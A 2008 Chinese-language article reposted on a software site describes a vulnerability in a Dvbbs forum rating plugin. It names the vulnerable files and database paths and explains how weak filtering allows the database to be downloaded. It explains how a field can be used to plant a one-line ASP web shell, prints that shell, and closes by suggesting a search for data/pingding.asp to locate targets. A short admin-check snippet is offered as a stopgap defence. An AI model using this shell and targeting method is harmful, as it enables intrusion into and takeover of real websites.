用户登录  |  傲看软件园 用户注册
文章中心广告代码ASP源码PHP源码JSP源码.NET源码源码相关傲看留言板繁體中文
当前位置:傲看软件园文章中心电脑安全安防业界

动网的新灾难-插件漏洞

减小字体 增大字体 作者:郁郁小蝎  来源:中国站长学院  发布时间:2008-10-20 20:22:35
就是关于“斑主评定”栏目,当然是插件。

插件比较乱,有很多,比如前台就是

z_disadmin.asp
z_disadmin_edit.asp
z_disadminconn.asp

后台在data/#pingding.mdb
有的后台在data/pingding.asp
有的则在data/disadmin_db.asp
另外有的后台会这样Data_plus/something的!

当然可以暴库,关键就是z_disadminconn.asp过滤不严,但是必须要找到它的所在,而且要二级。

利用的方法:

--------------------------------

关于mdb作数据库的,那当然没什么危险,这个漏洞也只能算是个鸡肋。
但是对于asp作数据库的,却有利用的方法。
这都是因为edit中一个update的错误,大部分字段都是整型的,因为数据库的规定

而有一个字段是可以写入木马的。

虽然长度有限制,但是够写一个微型木马了,我用<%execute request("allyesno")%>


对于暂时的防范,可以在edit中加入一个过滤参数:

-----------codz begin----------------
Head()
dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRs
admin_flag="22"
if not Dvbbs.master or instr(session("flag"),admin_flag)=0 then
  Errmsg=ErrMsg + "<BR><li>本页面为管理员专用,请<a href=admin_index.asp target=_top>

登陆</a>后进入。<br><li>您没有管理本页面的权限。"
  dvbbs_error()
end if
-------------codz end---------------

总而言之,只能说明开发插件的人头脑有问题。
虽然利用不大,扩散不广。但是还是有得玩的!

具体攻击:
应该是搜索data/pingding.asp。一般这个数据库没人改的

Tags:

作者:郁郁小蝎

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论

精品栏目导航

关于本站 | 网站帮助 | 广告合作 | 下载声明 | 友情连接 | 网站地图
冀ICP备08004437号 | 客服Q:354766721 | 交流群83228313
傲看软件园 - 绿色软件,破解软件下载站! 源码网 源码之家 绿软之家
Copyright © 2003-2010 OkHan.Net. All Rights Reserved .
页面执行时间:4,078.12500 毫秒
Powered by:OkHan CMS Version 4.0.0 SP2